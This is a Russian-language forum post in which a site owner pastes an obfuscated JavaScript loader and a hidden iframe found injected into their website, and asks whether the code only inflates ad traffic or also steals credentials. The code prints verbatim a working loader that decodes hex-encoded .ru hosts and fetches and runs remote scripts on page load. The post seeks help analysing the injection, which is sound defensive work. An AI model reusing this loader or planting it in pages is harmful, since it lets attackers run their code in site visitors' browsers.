Опытный
Профиль
Группа: Участник
Сообщений: 311
Регистрация: 5.11.2006
Где: Украина
Репутация: нет
Всего: нет
|
Привет! Обнаружил на сайте такую гадость: | Код |
<script>
window.a1336404323 = 1;
! function() {
var e = JSON.parse('["7537796231697931783378762e7275","6231746c34717962702e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),
t = "10252",
o = function(e) {
var t = document.cookie.match(new RegExp("(?:^|; )" + e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, "\\$1") + "=([^;]*)"));
return t ? decodeURIComponent(t[1]) : void 0
},
n = function(e, t, o) {
o = o || {};
var n = o.expires;
if ("number" == typeof n && n) {
var i = new Date;
i.setTime(i.getTime() + 1e3 * n), o.expires = i.toUTCString()
}
var r = "3600";
!o.expires && r && (o.expires = r), t = encodeURIComponent(t);
var a = e + "=" + t;
for (var d in o) {
a += "; " + d;
var c = o[d];
c !== !0 && (a += "=" + c)
}
document.cookie = a
},
r = function(e) {
e = e.replace("www.", "");
for (var t = "", o = 0, n = e.length; n > o; o++) t += e.charCodeAt(o).toString(16);
return t
},
a = function(e) {
e = e.match(/[\S\s]{1,2}/g);
for (var t = "", o = 0; o < e.length; o++) t += String.fromCharCode(parseInt(e[o], 16));
return t
},
d = function() {
return "pro1c.org.ua"
},
p = function() {
var w = window,
p = w.document.location.protocol;
if (p.indexOf("http") == 0) {
return p
}
for (var e = 0; e < 3; e++) {
if (w.parent) {
w = w.parent;
p = w.document.location.protocol;
if (p.indexOf('http') == 0) return p;
} else {
break;
}
}
return ""
},
c = function(e, t, o) {
var lp = p();
if (lp == "") return;
var n = lp + "//" + e;
if (window.smlo && -1 == navigator.userAgent.toLowerCase().indexOf("firefox")) window.smlo.loadSmlo(n.replace("https:", "http:"));
else if (window.zSmlo && -1 == navigator.userAgent.toLowerCase().indexOf("firefox")) window.zSmlo.loadSmlo(n.replace("https:", "http:"));
else {
var i = document.createElement("script");
i.setAttribute("src", n), i.setAttribute("type", "text/javascript"), document.head.appendChild(i), i.onload = function() {
this.a1649136515 || (this.a1649136515 = !0, "function" == typeof t && t())
}, i.onerror = function() {
this.a1649136515 || (this.a1649136515 = !0, i.parentNode.removeChild(i), "function" == typeof o && o())
}
}
},
s = function(f) {
var u = a(f) + "/ajs/" + t + "/c/" + r(d()) + "_" + (self === top ? 0 : 1) + ".js";
window.a3164427983 = f, c(u, function() {
o("a2519043306") != f && n("a2519043306", f, {
expires: parseInt("3600")
})
}, function() {
var t = e.indexOf(f),
o = e[t + 1];
o && s(o)
})
},
f = function() {
var t, i = JSON.stringify(e);
o("a36677002") != i && n("a36677002", i);
var r = o("a2519043306");
t = r ? r : e[0], s(t)
};
f()
}();
</script>
|
и фрейм такой | Код |
<iframe id="a1996667054" src="//u7yb1iy1x3xv.ru/f.html" style="display: none;"></iframe>
|
Что делает скрипт, я так и не разобрался. Лазил по нему и на каком-то этапе получил ссылку на js скрипт на этом ###сайте, который указан во фрейме. Добавляю файл со скриптом в приложение, потому что в сообщение не влазит. Посмотрев сюда, кажется, что суть этого всего - это накрутка рекламы. Это так? Или тут происходит что-то более страшное с точки зрения безопасности (какие-то данные типо явки/пароли куда-то уходят)?
Присоединённый файл ( Кол-во скачиваний: 2 )
script.txt 64,50 Kb |
Подскажите, что примерно делает этот скрипт 
Загрузка ...
